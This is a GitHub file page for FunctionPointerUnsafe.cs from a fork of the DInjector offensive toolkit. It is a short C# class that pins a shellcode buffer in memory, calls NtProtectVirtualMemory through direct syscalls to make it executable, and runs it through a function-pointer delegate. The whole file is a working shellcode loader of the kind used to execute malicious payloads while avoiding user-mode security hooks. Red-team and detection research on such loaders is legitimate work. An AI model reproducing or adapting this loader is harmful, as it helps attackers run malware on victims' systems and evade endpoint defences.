forked from rvrsh3ll/DInjector
-
Notifications
You must be signed in to change notification settings - Fork 0
/
FunctionPointerUnsafe.cs
49 lines (40 loc) · 1.63 KB
/
FunctionPointerUnsafe.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
using System;
using System.Runtime.InteropServices;
using DI = DInvoke;
using static DInvoke.Data.Native;
namespace DInjector
{
class FunctionPointerUnsafe
{
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
delegate void pFunction();
public static void Execute(byte[] shellcode, bool debug = false)
{
unsafe
{
fixed (byte* ptr = shellcode)
{
IntPtr baseAddress = (IntPtr)ptr;
#region NtProtectVirtualMemory (PAGE_EXECUTE_READ)
IntPtr hProcess = IntPtr.Zero; // Process.GetCurrentProcess().Handle
IntPtr protectAddress = baseAddress;
IntPtr regionSize = (IntPtr)shellcode.Length;
uint oldProtect = 0;
var ntstatus = Syscalls.NtProtectVirtualMemory(
hProcess,
ref protectAddress,
ref regionSize,
DI.Data.Win32.WinNT.PAGE_EXECUTE_READ,
ref oldProtect);
if (ntstatus == NTSTATUS.Success)
Console.WriteLine("(FunctionPointerUnsafe) [+] NtProtectVirtualMemory, PAGE_EXECUTE_READ");
else
throw new Exception($"(FunctionPointerUnsafe) [-] NtProtectVirtualMemory, PAGE_EXECUTE_READ: {ntstatus}");
#endregion
pFunction f = (pFunction)Marshal.GetDelegateForFunctionPointer(baseAddress, typeof(pFunction));
f();
}
}
}
}
}